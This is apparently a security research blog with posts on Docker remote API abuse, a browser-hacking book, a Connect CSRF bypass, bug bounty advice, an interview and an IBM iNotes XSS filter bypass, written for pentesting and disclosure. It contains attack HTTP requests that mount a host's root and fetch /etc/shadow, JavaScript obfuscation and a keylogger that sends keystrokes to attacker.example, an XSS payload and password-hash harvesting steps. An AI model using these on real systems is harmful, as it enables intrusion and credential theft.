
September 09 2014

07:39

Abusing Docker's Remote APIs

Forewords: is this post about a security vulnerability?

Ultimately it's not. This is a short note on how to exploit a somewhat under-documented feature of the Docker remote APIs, since I did not manage to find clear guidance elsewhere and had to experiment with it myself. The reason for sharing is to save you time during your next pentest. That said, do I think this is bad? Yes, I do, as I will explain later on.

So, what is this about?

TL;DR: Docker's remote APIs, by design, trivially allow anyone with access to them to obtain access to the host's file system, and are unauthenticated (but disabled) by default.

Docker is a container-based platform for application "shipment", but to be fair, the official what is Docker page does a better job at explaining what this is all about. Docker is all the rage these days, and if you have never heard of it you should really look it up. It's quite likely to show up in one of your next penetration tests, since companies seem to be experimenting with it quite extensively.

Docker is usually managed via a command line tool, which connects to the Docker server via a Unix socket. Access is restricted to the root user by default or to an aptly named Docker group, at least on the Ubuntu packages I've experimented with. So far, so good (sort of, but I don't really have strong arguments here).

This is of course not very convenient if you are working in any environment but your bedroom, so the helpful devs have provided a RESTful API which can be bound to any HTTP port. It is not enabled by default, which is worth stressing, but can be turned on via a flag (-H tcp://IP_ADDRESS:PORT). IANA has assigned ports 2375 and 2376 to the cleartext and SSL-protected versions of the APIs respectively.

Looking at the API reference you'll see the APIs support all the operations you'd expect in a VM-management tool. By default there is no authentication, so all you need to do is find the target (which you can fingerprint by hitting the /version endpoint) - unless, of course, the admin has enabled some other kind of protection. The simplest way to do so is to use Docker's tlsverify feature (the --tlsverify flag, together with --tlscacert/--tlscert/--tlskey), and everyone should do that. However, given that the process does not work on OS X, guess how many programmers' laptops you are going to pop?

Accessing the host file system

The trick is ultimately quite simple: you just start a new container (think of it as a VM and you won't be far off) with a special configuration, then access it. First, create a container on the host (I'm trying to keep the call small here):

POST /containers/create?name=cont_name HTTP/1.1
Content-Type: application/json
    {
      "Cmd": ["/bin/bash"],
      "Image": "ubuntu"
    }

You'll get back an ID for your container. Now, start the container - note that in my experiments I was able to make these "Binds" work only once, the first time a container is started.

POST /containers/$ID/start HTTP/1.1
Content-Type: application/json

 {
  "Binds":["/:/tmp:rw"]
 }

Now you have a running container where the /tmp directory maps back to the / of the host. You still have to log into the container to go wild on the host, and since you don't have direct access to said poor host, you need SSHd running in your container. The default Ubuntu image won't have SSHd up, so you'll have to use a different image (consider baseimage-docker) or tweak the Cmd - this very last part is left as an exercise for the reader... or scream at me enough in the comments and I'll come up with something. Alternatively, you might be able to use the copy endpoint (documentation of the copy endpoint), but I've not experimented with that.
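For completeness, here is what such a copy call would presumably look like based on the API reference - a hedged sketch, since as said I've not tested it, and the path assumes the Binds mapping from the previous step:

POST /containers/$ID/copy HTTP/1.1
Content-Type: application/json

 {
  "Resource": "/tmp/etc/shadow"
 }

If it behaves as documented, the response is a tar stream containing the requested file - no SSHd needed at all.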

Why this is worth writing about, or why I don't like un-authed admin interfaces

As I said at the beginning of the post, this writeup is mostly a time saver for those dealing with Docker during a penetration test. However, there is something that I don't like in the way Docker has gone about designing these APIs: the complete lack of any authentication by default.

There are of course various reasons why you would ship such a critical feature with no authentication to be seen: time to market, the fact that after all it is disabled by default, or more likely the wish to attain segregation of duties. Designing a secure authentication system is complicated and error prone, and ultimately not the role of an API; delegating it is a better idea than botching it, so that it is clear where things go wrong.

I beg to disagree, and I'd have expected better from a company that produced such a well-thought-out discussion of the security issues with running SSH in a container. I'm going to argue that there is a huge gap between having a clearly horrible authentication system and nothing at all. The sad truth, as anyone who has done any pentesting in his career will tell you, is that the vast majority of end users will run with whatever was shipped out of the box. Security people cheered when Oracle started to require users to set passwords during installation instead of setting default ones (ok ok, that's a long story), and the experience of the Internet Census tells us how easy it is to forget to change that password, or to set up that auth.

Of course, security-minded admins will set things up correctly and invest all the time needed to configure a secure environment. But what about the others? Was it so difficult to require a Basic Auth-powered password at startup?

Friction (as in, anything that makes your product harder to use) is bad, but pwned users are worse.

Bonus: Here is a simple nmap probe for the Docker APIs.

##############################NEXT PROBE##############################
# Queries Docker APIs for the /version url containing version information.
#
Probe TCP docker q|GET /version HTTP/1.1\r\n\r\n|
rarity 7
ports 2375
sslports 2376

match docker m|.*{"ApiVersion":"(.*)","Arch".*"GitCommit":"(.*)","GoVersion".*"Os":"(.*)","Version":"(.*)"}.*| p/Docker remote API/ v/$1/ o/$3/ i/GitCommit:$2 DockerVersion:$4/

July 07 2014

07:43

Five questions with: Vincent Bénony (Hopper Disassembler)

In recent years, we have seen an increase in micro software-houses building amazing security software and actively contributing to redefining how we do security. Personal projects quickly turn into powerful tools used by thousands of people to improve the security of many systems around the world. We live in exciting times, where a small team can build things that are going to shape the future of infosec. At NibbleSec, we support and celebrate those successes.

Today, we asked Vincent Bénony to talk about his experience with the Hopper Disassembler:

Q: Hi Vincent, would you mind telling us a little bit about yourself? How did you get into programming and security?

A: Hi! This is a long story...I started programming when I was very young, with the Oric Atmos (if any of you remember this computer). Back then, I was 7 and I’m not sure that I understood what I was doing. I continued on the Amiga, where I really discovered the assembly language with the Motorola 68000. By the way, these were my very first steps with reverse engineering. Like many other guys at that time, I started looking at the anti-copy schemes of games. Each time, it was a really fun challenge. Then, I moved to the demo scene and continued coding small demos. Naturally, I chose to study computer science at the university where, later on, I defended my PhD in the field of cryptography. That was the time when I got back to security and reverse engineering.

Q: When did you realize that Hopper was something more than a personal project? How did this happen?

A: I started working on Hopper as a hobby project, as I was not able to afford the price of an IDA license. At that time, I realized that I didn't need such a powerful tool, and that only a few of IDA's features were really useful to me. Being an OS X user, I really don't like the look-and-feel of most Qt applications, as they're just a raw transposition of the Windows versions; they feel like aliens in my OS, and most of the UX habits cannot be transposed to these UIs. Qt is a great toolkit - I love it, and I use it for the Linux version of Hopper - but I really think that each version has to be customized for the targeted OS… So, I decided to write a very little program to do interactive disassembly. And the project started to grow. It was developed at night, after my day job, and when my children were sleeping :) And then, the Mac App Store was announced… It changed many things. A friend of mine - Hello Sebastien B. :) - told me that I should try to see if there were people interested in such an application on the Mac App Store. I really doubted it at first, but I tried anyway… and then… a miracle. I rapidly encountered many people who were interested in the idea of a lightweight alternative to IDA for OS X. The project started to require a lot of time. I received a lot of very positive feedback from users, hence I had to make a choice between my job and Hopper… I decided that I had to take my chance. Today, I'm always amused when I look at the very first screenshots of Hopper. It helps me to measure the amount of work that has been done :)

Q: As a micro software company, what are the problems and opportunities?

A: The problems are multiple. First, the development of the software itself represents only a small part of my day-to-day job. Commercializing software is not just producing code. I have to deal with many things like the website, user support, legal aspects (accounting, taxes…), and even things that may sound anecdotal but take me a lot of time, like drawing icons :) - btw, I'm clearly not a designer. That being said, this is only a matter of organization. And I'm always pleased to see that there is so much positive feedback! This is something that pushes me beyond my limits. I always try to communicate as much as I can about the software and its development. Many times, people are talking about the project on media like Twitter, which is a really great tool for helping me reach potentially interested people. Security conferences are also something that I try to follow as much as I can. For instance, I try to go to every conference in France: I'm almost sure to meet people who use this kind of software, and their feedback is always of great value! Most of the features that were added to Hopper v3 are things that were discussed with people I met at conferences like NoSuchCon in Paris.

Q: Being a one-person software company, how do you track and prioritize new features and bugs? Which software development model are you following? In other words, how do you make sure that you're working on something relevant?

A: I'm an academic person, hence I was not really at ease with the software development methods used by real companies. I don't know how it works outside France, but the studies I followed were purely about the theoretical aspects of computer science and nothing else. I have a coherent vision of what I would like to achieve with Hopper. I always read all the messages that I receive from my customers, and I put every idea that is compatible with my initial vision for the software on my todo list. I always try to avoid mutating Hopper into something that pretends to fit the needs of everyone; I want it to be lightweight and coherent. Once I have filtered the features that I want to implement, I usually start with the most visible part, implementing stubbed-out functional parts. This is a good way to get rapid visual feedback. If the feature still makes sense according to my usual workflow, it is kept. I really need to see the progress on a feature, and starting with the visual parts helps me a lot! Another thing: I strongly believe that the only way to write something coherent is to be the first client of your own software. I use Hopper a lot, for many things, even debugging Hopper itself :)

Q: What would you recommend to people starting or maintaining a security tool? Which business model would you recommend to turn a personal project into a sustainable source of income?

A: I'm not sure whether my very little experience in the field is really relevant. Evaluating simple things, like the product price, the target audience, and so on, is very difficult, but it's something that needs to be done. After that, I really love to simulate things: I wrote tons of Python scripts to simulate the viability of my company for the next 10 years (with a lot of pessimistic hypotheses, to avoid future problems). Whether Hopper will continue to be a stable project is too soon to say, but I did my best to avoid jumping into the wild with no clear view of what I want to achieve. Anyway, deciding to work full-time on Hopper was one of the best things that I've ever done: working on something stimulating is really awesome! Sometimes exhausting, but really awesome :)

June 03 2014

14:37

An Overview of The Browser Hacker's Handbook

Writing a book is definitely a big and time-consuming task. After one year, Wade Alcorn, Cristian Frichot and I finally released the Browser Hacker's Handbook in March 2014. Looking back at our git repository (I know it's not ideal to track binary file changes such as MS Word with git..), I counted more than 2300 commits, starting 5 December 2012 with drafting the ToC and finishing 30 March 2014 with the creation of the https://browserhacker.com website.

Only after you write a book can you understand two things:
 - why your partner always deserves the first big THANKS
 - why you will not write another book for at least the next 5 years

Our adventure started when Wade and I were discussing creating a BeEF training to be presented at SysCan. Eventually we decided to switch to the book and maybe take care of the training later on (it's still on our overly long TODO list).

The Browser Hacker's Handbook (BHH) is the first book focused entirely on browser hacking from the attacker's perspective, something that had been missing so far (even Portswigger mentions that in the Web Application Hacker's Handbook, 2nd edition). There are other books I personally recommend if you're interested in browser/web security, like The Tangled Web by Michał Zalewski and Web Application Obfuscation by Mario Heiderich (friend and BHH technical editor, kudos!) et al. Both books are great and technically deep, but neither focuses exclusively on the browser ecosystem and how it can be attacked, so there you go, BHH :-)

Something worth noting is that this is not a book about BeEF: it is mentioned multiple times, but it's not the focus of the book. Most of the code (see http://browserhacker.com/code/code_index.html) is pure JavaScript/Ruby, which you can use with your own browser hacking framework or something else entirely different from BeEF. BeEF is mentioned throughout the book not only because Wade created it and I'm the lead core developer, but simply because there is no other open source tool at the moment that is mature enough (yeah, we're still in alpha..) and has the number of modules currently in BeEF. Many people around the world use BeEF professionally for social engineering and red-team assessments with success, demonstrating that BeEF is mature enough to be used during your own pentests. Even Jester modified it, adding a bunch of 0days and other stuff, and was using it in the wild a while back: http://jesterscourt.cc/2012/07/04/project-looking-glass/

What we decided to do was to create the first browser hacking methodology that comes in handy in red-team and social engineering engagements. The methodology can be summarized with the diagram below:
As you can see, there is an entire chapter dedicated to each of these categories, and to be honest it wasn't that easy to assign some of the attacks to one chapter rather than another. For instance, we discuss multiple RCEs in various web applications in Chapter 9 (and how you can exploit them cross-origin from the hooked browser), but also in Chapter 10 when discussing the BeEF Bind shellcode technique. SOHO router attacks and some social engineering attacks are other examples of attack categories that overlap multiple chapters.

Initiating Control
The book starts by introducing control initiation techniques, a mandatory step if you want the target browser to execute your malicious code. It covers the multiple types of XSS, including DOM-based and Universal XSS, social engineering attacks involving baiting and phishing (btw, you can do template-based mass-mailing and phishing all with BeEF), and finishes with classic Man-in-the-Middle scenarios like ARP Spoofing, DNS Poisoning, Wi-Fi related attacks and so on. After experimenting with the source code and attacks discussed in this chapter, you should have a solid grasp of how to start your browser hacking journey.

Retaining Control
You initiated control with the browser executing some code, most likely JavaScript: now you need to retain that control for as long as possible. Some attacks might need only one or two seconds to complete; others might take several seconds or minutes depending on their configuration. Additionally, you want a dynamic (in other words, bidirectional) communication channel, so that the hooked browser can exfiltrate data to your server and the server can push new code to be executed by the browser. Communication techniques such as XMLHttpRequest polling, WebSockets and DNS Tunneling (yes, bidirectional and purely in the browser without using plugins) are discussed, as well as persistence techniques like Overlay IFrames, pop-unders, browser events and more advanced Man-in-the-Browser attacks. The chapter finishes by presenting examples of evading detection and playing with obfuscation, which can generally be summarized as a decode-and-evaluate pattern.
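A minimal illustrative sketch of that pattern in JavaScript (the encoded payload is a placeholder, not the book's original listing):

// Ship the payload in an encoded form and only materialize it at
// runtime, defeating naive signature-based detection.
var encoded = "YWxlcnQoJ0JlRUYnKQ=="; // base64 for: alert('BeEF')
var decoded = atob(encoded);          // decode right before use
new Function(decoded)();              // evaluate the reconstructed code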

Bypassing the SOP
The Same Origin Policy is probably the most important, most inconsistently implemented, and most frequently broken and bypassed security control in today's browsers. The chapter goes through many different SOP implementations in Java, Adobe Reader/Flash, Silverlight and multiple browsers, presenting well-known and less-known quirks, bugs and bypasses (some of them not even patched, or by-design). This chapter also analyzes UI redressing attacks such as Clickjacking, Cursorjacking, Filejacking and drag&drop tricks, and provides some real-world examples of how to steal browser history. Bypassing the SOP is an optional step, as are the following attack phases. While you need to initiate and retain control, you might not need to bypass the SOP or attack web applications if your goal is, for instance, to trick the user into installing a backdoored Chrome extension. Going through the book, especially Chapters 9 and 10, you will discover the multitude of attacks you can still deliver against web applications and networks without the need for a SOP bypass.

Attacking Users
Humans are often referred to as the weakest link in information security. Is it our inherent desire to be ‘helpful’? Perhaps it’s our inexperience. Or is it simply our (often) misplaced trust in each other? Either way, social engineering users is always fun. The less they know about computers in general, the better, as they tend to click OK or ALLOW on any kind of real or spoofed user prompt you can create. This chapter introduces how to capture multiple types of user input by hooking JavaScript events.

For instance, a nice and easy attack, in case the browser was hooked via a post-auth XSS, is to create an overlay IFrame that loads the login page of the hooked origin (a same-origin resource). The IFrame also has a JavaScript keylogger attached to it: the user thinks his session just expired, so he enters his credentials, which are captured and sent back to us. At the same time, the attack achieves some form of persistence, as the communication channel keeps running in the background while the user browses inside the foreground overlay IFrame. Many other social engineering attacks are discussed, such as Signed Java Applets, Fake Software Updates, Malicious Extensions, HTAs and other Internet Explorer tricks.
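A rough sketch of the overlay-plus-keylogger idea in plain JavaScript (the styling and the collection URL are made up for illustration):

// Cover the page with an IFrame loading the hooked origin's login page.
var frame = document.createElement('iframe');
frame.src = '/login'; // same-origin, so its DOM stays accessible
frame.style.cssText = 'position:fixed;top:0;left:0;width:100%;' +
                      'height:100%;border:0;z-index:99999;background:#fff';
document.body.appendChild(frame);

frame.onload = function () {
  // Attach a keylogger to the framed login page.
  frame.contentDocument.addEventListener('keypress', function (e) {
    // Exfiltrate each keystroke to the attacker's server (placeholder URL).
    (new Image()).src = 'http://attacker.example/k?c=' +
        encodeURIComponent(String.fromCharCode(e.which));
  }, true);
};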

Attacking Browsers
This chapter deals with attacking the browser itself. Before attacking it, you want to fingerprint exactly which browser type and version is hooked. Fingerprinting through HTTP headers, DOM properties, software bugs and other quirks is discussed. By combining these fingerprinting techniques, you can be almost certain of an accurate result even if someone is spoofing his browser type/version. Cookies, protocol handlers (aka schemes) and the SSL/TLS layer are also discussed, with some examples of attacks and bypasses. The chapter ends with an analysis of heap exploitation in Firefox and other examples of how you can get shells if you find a bug in the browser's JavaScript interpreter or HTML parser.
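As a toy example of the DOM-property approach (illustrative only, not one of the book's modules):

// Compare the claimed User-Agent with a Firefox-only DOM global:
// if they disagree, the User-Agent is likely spoofed.
var claimsFirefox = /Firefox/.test(navigator.userAgent);
var actuallyFirefox = (typeof InstallTrigger !== 'undefined');
if (claimsFirefox !== actuallyFirefox) {
  // Trust the DOM quirk, not the header.
}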

Attacking Extensions
Browser extensions always run in a privileged context, with higher privileges than, for instance, the normal context where JavaScript is executed when you browse to https://browserhacker.com. For this reason, if the extension is vulnerable, or if you can trick the user into installing your malicious extension, it's usually game over. Firefox and Chrome extensions are discussed, including fingerprinting, spoofing, cross-context scripting and various RCEs. Remember that, at the time of writing the book and this blog post, Firefox extensions do not run in a sandbox, so an XSS in an extension leads to RCE. Chrome extensions (especially with manifest version 2, which is the default right now) are less vulnerable, especially thanks to the adoption of the Content Security Policy, but the malicious/backdoored extension social engineering trick is still a viable option. Luca and I discussed this a while ago in this post: http://blog.nibblesec.org/2013/03/subverting-cloud-based-infrastructure.html

Attacking Plugins
In the years (well, months) before Click-to-Play was implemented in the Java plugin and in Chrome/Firefox, 0days in Java, Adobe Reader/Flash, RealPlayer, VLC and others were the preferred and easiest way to create botnets. The exploitation of those bugs in the wild was pretty crazy. So far, Internet Explorer and Safari are the only major browsers that still do not implement Click-to-Play, so plugin attacks are still quite viable against those browsers, but not really an option on Chrome/Firefox (unless you have a Click-to-Play bypass in your 0day collection). Multiple bypasses are discussed in the chapter, as well as other tricks you can use with VLC, ActiveX and Java.

Attacking Web Applications
The main concept behind BHH is abusing existing functionality of the browser ecosystem to subvert the system. This includes launching traditional web application attacks from the hooked browser, which effectively becomes a beachhead and a pivot point into the internal network. Something probably not that well known is that, even without a SOP bypass, you can still send cross-origin requests that do not generate a preflight request. This obviously happens with GET and HEAD, but also with POST using certain content types such as text/plain, application/x-www-form-urlencoded and multipart/form-data. Such behavior is enough to carry out attacks where:
 - you need to "blindly" send the request: for example, you can exploit any XSRF, RCE, DoS and so on cross-origin;
 - you need to infer from request/response timings: for example, you can exploit cross-origin any kind of SQL injection using time-based blind attack vectors.
You can even detect and blindly exploit XSS cross-origin, damn! You can do so many things fully cross-origin, without a SOP bypass, that you have to read the chapter to get a good grasp. You can even create a full HTTP/HTTPS proxy with just an XSS.
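A minimal sketch of such a preflight-free cross-origin request (the target URL and parameter are placeholders):

// A "simple" POST: text/plain, application/x-www-form-urlencoded and
// multipart/form-data content types do not trigger an OPTIONS preflight.
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://intranet.example/admin/action', true);
xhr.setRequestHeader('Content-Type', 'text/plain');
var start = new Date().getTime();
xhr.onreadystatechange = function () {
  if (xhr.readyState === 4) {
    // The SOP prevents reading the response, but the request was
    // delivered (blind CSRF/RCE) and its duration is measurable
    // (time-based blind SQL injection).
    var elapsed = new Date().getTime() - start;
  }
};
xhr.send('id=1');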

Attacking Networks
The last chapter of the book focuses on attacking networks (mostly internal networks, but not limited to them), starting with various techniques to retrieve the internal IP address of the hooked browser, and moving on to ping sweeping, port scanning and fingerprinting. The main part of the chapter is devoted to IPC/IPX, Inter-protocol Communication and Exploitation. Basically, you can communicate via HTTP with non-HTTP protocols like IRC, SIP, IMAP and most ASCII protocols if two conditions are met:
 - the protocol implementation is tolerant to errors, meaning that it doesn't close the socket when you send garbage data;
 - the target protocol data can be encapsulated into HTTP requests.
Generally speaking, when IPC works, you communicate with the target protocol by sending a POST request whose body contains protocol commands. The HTTP request headers are discarded as invalid commands, but the POST body is actually executed.
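A rough sketch of the idea against an IRC daemon (host, port and channel are placeholders; note that browsers ban a few well-known ports such as 6667, a restriction the book also covers):

// Smuggle IRC commands inside an HTTP POST body. The IRC daemon
// rejects each HTTP header line as an invalid command but keeps the
// socket open, then executes the commands found in the body.
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://192.168.1.10:6667/', true);
xhr.setRequestHeader('Content-Type', 'text/plain');
xhr.send('NICK hooked\r\nUSER hooked 8 * :hooked\r\nJOIN #beef\r\n');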

In the book we exploit this behavior to deliver shellcode: the BeEF Bind shellcode, originally written by Ty Miller for Windows and ported to Linux by Bart Leppens. BeEF Bind is a staging bind shellcode that acts like a minimal web server, returning the Access-Control-Allow-Origin: * HTTP response header and piping OS commands. In this way the browser can communicate via HTTP with the compromised box, giving you a stealthier communication channel, as you can see in the diagram below:

So, this is the Browser Hacker's Handbook! Read it and experiment with the code at https://browserhacker.com if you're interested in hacking browsers or web application security, or if you need to secure your (web) infrastructure. Your browsers and intranets have never been more exposed! :-)

Cheers
antisnatchor

May 05 2014

16:27

Node.js Connect CSRF bypass abusing methodOverride middleware

In the previous post, I discussed the importance of well-written documentation and uncomplicated APIs, suggesting that poor documentation and negligence should be considered silent threats.

Almost a year ago, I reported the following issue to the Node.js Connect maintainers. To me, this is a perfect example of the risks of incomplete API documentation that doesn't clearly warn the user of potential side-effects. Please note that in recent releases of Express, connect-csrf is now called csurf and methodOverride is now method-override. Different names, same API.

Disclosure timeline

This issue was reported to SenchaLabs on 07/25/2013. Despite my requests to add a warning to the online documentation, there's still no indication of potential side-effects in Connect's methodOverride. On 09/07/2013, this advisory was also published by the NodeSecurity community. Unfortunately, I don't think the issue received an adequate level of attention, as suggested by the many vulnerable applications that I've encountered.

Technical details

Connect's methodOverride middleware allows an HTTP request to override the HTTP verb with the value of the _method POST parameter or of the X-HTTP-Method-Override header. Since the declaration order of middlewares determines the execution stack in Connect, it is possible to abuse this functionality to bypass Connect's standard anti-CSRF protection.
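Conceptually, the middleware behaves along these lines (a simplified sketch for illustration, not Connect's actual source):

// Rewrites req.method before later middleware in the stack sees it.
function methodOverride(req, res, next) {
  var method = (req.body && req.body._method) ||
               req.headers['x-http-method-override'];
  if (method) {
    req.originalMethod = req.originalMethod || req.method;
    req.method = method.toUpperCase(); // e.g. GET becomes POST
  }
  next();
}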

Considering the following code:

...
app.use(express.csrf());
...
app.use(express.methodOverride());

Connect's CSRF middleware does not check CSRF tokens for idempotent verbs (GET/HEAD/OPTIONS, see csurf/index.js). As a result, it is possible to bypass the security control by sending a GET request carrying a POST override in the _method parameter or the X-HTTP-Method-Override header.

GET / HTTP/1.1 
[..]
_method=POST

The workaround is clearly to disable methodOverride, or to make sure that it is declared before the CSRF middleware so that the override is applied before the token check.
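In code, the safe ordering looks like this (sketch):

// Safe: the override runs first, so the CSRF middleware sees the
// effective verb and checks the token on overridden "POST" requests.
app.use(express.methodOverride());
app.use(express.csrf());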

Adam Baldwin made an eslint plugin that you can use to identify this issue.

May 01 2014

05:48

On web frameworks, built-in security mechanisms and common pitfalls

Modern web application frameworks are expected to provide built-in security mechanisms against common flaws, such as Cross-Site Request Forgery and injection attacks. Developers benefit from these protections as they don't need to create ad-hoc defense mechanisms and can rather focus on building features.

Citing the OWASP Framework Security project: "The most effective way to bring security capabilities to developers is to have them built into the framework."

Although built-in security features have clearly improved web security, using a framework doesn't necessarily guarantee a bullet-proof application. When theory and practice diverge, things can still go wrong:
  1. Frameworks are not immune to bugs. They are software. As such, they can be affected by security issues too. Security mechanisms can be bypassed or abused.
  2. Poor or inconsistent documentation. Using appropriate APIs and invoking those calls in the right way is a crucial aspect of leveraging all security mechanisms. Unfortunately, the quality of the documentation doesn't always facilitate the job of developers.
  3. Negligence. Developers still need to read (and understand) the documentation. Building secure software is complicated and requires an in-depth understanding of all the subtle details.
Although dealing with security issues in production environments is always painful, fixing application framework bugs is even more complicated. As they usually impact a high number of websites, weaponized exploits are often available within a few hours of disclosure. On the other hand, not all vendors are sufficiently agile to provide a patch, and homegrown fixes may not be trivial. Finally, developers and QA engineers do not necessarily have visibility into the actual code changes, so they're forced to perform full regression testing to make sure that the application still works as expected.

Despite that, security bugs are generally the most evident problem. High-impact security flaws in common frameworks generate Hacker News threads, flames in security mailing lists, and even mainstream attention. Good developers and blue teams follow security mailing lists, vulnerability feeds and vendor announcements. The probability of stumbling upon an advisory is close to one.

On the contrary, poor documentation and negligence are silent threats. You won't find as many blog posts or security advisories talking about 'insecure' API usage or misconfigurations.
For instance, everyone in the security community uses the CVE acronym, but just a few folks know what CCE stands for (btw, it's Common Configuration Enumeration).

Since the very first days, the CVE Editorial Board has recognized the need to address both software flaws (aka vulnerabilities) and mis-configurations (aka exposures). The CCE project is a logical next step in the evolution of CVE to finally address the 'E' in CVE.

To reinforce my point, let's think together about real-life examples for each category:
  1. Frameworks are not immune to bugs. Apache Struts and the countless OGNL expression code execution bugs (CVE-2014-0094, CVE-2013-2251, CVE-2013-2135, CVE-2013-2134, CVE-2012-0838, ...), Ruby on Rails' Action Pack parsing flaw (CVE-2013-0156), Spring's Expression Language injections (CVE-2011-2730), PHP Laravel cookie forgery to RCE, ...and many others. Just a few examples off the top of my head.
  2. Poor or inconsistent documentation. Scrypt API misuse, ...what else?.. PHP htmlspecialchars.
  3. Negligence. Ruby Mass Assignment, Java SecureRandom, ...it's getting hard.


It's up to us, the community.

Improving application security is not just discovering and fixing security bugs. It's making sure that we have the right foundations and we build secure software on top of that. We need to trust our tools and know how to use them.

Collaboration and open source are crucial to winning this game. As GitHub has successfully demonstrated, code collaboration is fertile ground. Encouraging code review and transparency creates opportunities for developers and the security community to improve code quality and other software development artifacts - including documentation.

Inspire your company to contribute back to the open-source projects on which you rely. As a developer, spend time crafting easy-to-use APIs accompanied by clear documentation. If you're a security researcher, don't stop after you discover a bug: submit a patch and help the project prevent similar issues. Small things can really make the difference.





August 22 2013

05:47

Five Golden Rules For A Successful Bug Bounty Program

Bug bounty programs have become a popular complement to already existing security practices, like secure software development and security testing. In this space, there are successful examples with many bugs reported and copious rewards paid out. For vendors, users and researchers, this seems to be a mutually beneficial ecosystem.

The truth is that not all bug bounty initiatives have been so successful. In some cases, a great idea was poorly executed, resulting in frustration and headaches for both vendors and researchers. Ineffective programs are mainly caused by security immaturity, as not all companies are ready and motivated enough to organize and maintain such initiatives. Bug bounties are a great complement to other practices, but they cannot completely substitute professional penetration tests and source code analysis. Many organizations fail to understand that and jump on the bounty bandwagon without having mature security practices in place.

Talking with a bunch of friends during BlackHat/Defcon, we came up with a list of five golden rules to set your bug bounty program up for success. Although the list is not exhaustive, it was built by collecting opinions from numerous peers and should be a good representation of what security researchers expect.

If you are a vendor considering starting a similar initiative, please read it carefully.

The Five Golden Rules:

1. Build trust, with facts
Security testing is based on trust between client and provider. Trust is important during testing, and especially crucial at disclosure time. As a vendor, make sure to provide as much clarity as you can. For duplicate bugs, increase your transparency by providing more details to the reporter (e.g. date/time of the initial disclosure, original bug ID, etc.). Also, fixing bugs while claiming that they are not relevant (and thus not eligible for rewards) is a perfect way to lose trust.

2. Fast turnaround
Security researchers are happy to spend extra time explaining bugs and providing workarounds; however, they also expect to be notified (and rewarded) at the same reasonable speed. From bug report to reward payout, you should have a fast turnaround. Fast means days - not months. Even if you need more time to fix the bug, pay out the reward immediately and explain in detail the complexity of rolling out the patch. Decoupling internal development life cycles from bounties allows you to be flexible with external reporters while maintaining your standard company processes.

3. Get security experts
If you expect web security bugs, make sure to have web security experts around you. For memory corruption vulnerabilities, you need people able to understand root causes and investigate application crashes. Whether internally or through trusted third parties, this aspect is crucial for your reputation. Many of us have experienced situations in which we had to explain basic vulnerabilities and how to replicate them. In several cases, the interlocutors were software engineers and not security folks: we simply speak different languages and use different tools.

4. Adequate rewards
Make sure that your monetary rewards are aligned with the market. What's adequate? Check Mozilla, Facebook, Google, Etsy and many others. If you don't have enough budget, just set up a wall of fame, send nice swag and be creative. For instance, you could decide to pay only for specific classes of bugs, or for medium-to-high impact vulnerabilities. Always paying at the low end of your reward range, even for critical security bugs, is just pathetic. Before starting, crunch some numbers by reviewing past penetration test reports performed by recognized consulting boutiques.

5. Non-eligible bugs
Clarify the scope of the program by providing concrete examples, eligible domains and types of bugs that are commonly rejected. Even so, you will have to reject submissions for a multitude of reasons: be as clear and transparent as possible. Spend a few minutes explaining the reason for rejection, especially when the researcher has over-estimated the severity or not properly evaluated the issue.

Happy Bug Hunting, Happy Bug Squashing!

August 09 2013

20:50

All your (iNotes) emails are belong to me

This post describes a critical bypass of the Active Content Filtering (ACF) mechanism implemented in IBM iNotes to prevent the inclusion of malicious HTML tags in emails. The bug was identified during a web application penetration test and can be exploited to perform stored Cross-Site Scripting (XSS) attacks. The bypass has been successfully verified against IBM iNotes 9, and an official bulletin and fix were released on August 1st, 2013.

From zero to Domino admin in a matter of hours


Early this spring I was asked to assess the security of the mail infrastructure owned by a big company here in Italy. Pentesting the Domino/Notes/iNotes ecosystem is nowadays a piece of cake, thanks to the large amount of publicly available documentation, advisories and tools.

If you are interested in testing this kind of infrastructure, I would recommend the following resources.

First of all, Marco Ivaldi's script can be used to automatically download all users' password hashes, together with details about every single account (e.g. name, surname, e-mail address, etc.). By simply accessing the names.nsf web resource, the tool extracts the desired information disclosed by the hidden attribute named HTTPPassword. The extracted hashes can then be easily cracked using John the Ripper: William Ghote gave a great talk at BSides Las Vegas 2012 detailing the Lotus Notes password cracking process.

Finally, Penetration from application down to OS - Lotus Domino by Alexandr Polyakov and Lotus Domino: Penetration Through the Controller by Alexey Sintsov complete the picture providing even more details on how to pentest Lotus Domino deployments.

The links above are amazing resources that describe step by step how to easily hack into a mail infrastructure based on IBM solutions. In my experience, a standard attack pattern to breach the Domino/iNotes infrastructure and access every company e-mail account can be schematized as follows:

  1. Identify the location/path of the names.nsf web resource;
  2. Identify the user(s) with administrative privileges;
  3. Verify the user's password hash disclosure via the HTTPPassword hidden attribute;
  4. Get all the administrators' password hashes;
  5. Crack the obtained hashes with John the Ripper;
  6. Log into the Domino Web Administrator application and have a drink.

The whole process took less than 30 hours, and I can't hide that, at least this time, the task was as easy as cutting and pasting known attacks against an outdated environment. As my pentest objectives were quickly accomplished, I decided to turn my job into a security research session and dedicated the rest of the engagement to verifying the effectiveness of the aforementioned ACF mechanism.

Active Content Filtering (ACF) vulnerability details


The analysis of the filter started by injecting simple and well-known XSS attack vectors, in order to understand the underlying logic and spot potential defects. Based on my analysis - which must be considered an incomplete understanding of the filter's internals, derived exclusively from black-box observations - ACF tries to block malicious HTML tags both by commenting out JavaScript code specified via the <script> tag and by normalizing/filtering tag attributes that could lead to client-side code execution (e.g. by eliminating onXYZ event handlers, such as onerror or onmouseover). During the engagement, I found that the filtering is not properly implemented and allows an attacker to inject arbitrary attributes. In detail, ACF is not able to correctly sanitize the character sequence src="<. For the sake of clarity, the following attack payload:

<img src="< onerror=alert(1) src=x>

would be transformed into:

<img < onerror=alert(1) src=x>

resulting in the execution of the JavaScript alert method. Figure 1 shows how the above vector is incorrectly handled and used to set the BodyHtml variable - which contains the mail's HTML body.

Figure 1 - Bypass of the ACF mechanism and injection of JavaScript code.

Conclusion


The ACF bypass can be effectively abused to perform stored XSS attacks against iNotes users. In a real-world attack scenario, the bug could not only be exploited to perform session hijacking, but also combined with Cross-Site Request Forgery (CSRF) to add a new e-mail forwarding rule to the victim's iNotes application, effectively backdooring the victim's mailbox.

The following video demonstrates the execution of arbitrary JavaScript thanks to the described vulnerability. Moreover, it shows how the mail preview feature, if enabled, means the victim is not even required to open the message to trigger the execution of the JavaScript code - greatly reducing the required user interaction:





Finally, I would like to thank my colleagues Sandro Zaccarini and Leonardo Rizzi for providing me with the infrastructure to properly investigate this issue, and the IBM Product Security Incident Response Team (PSIRT) for their timely responses and professionalism.

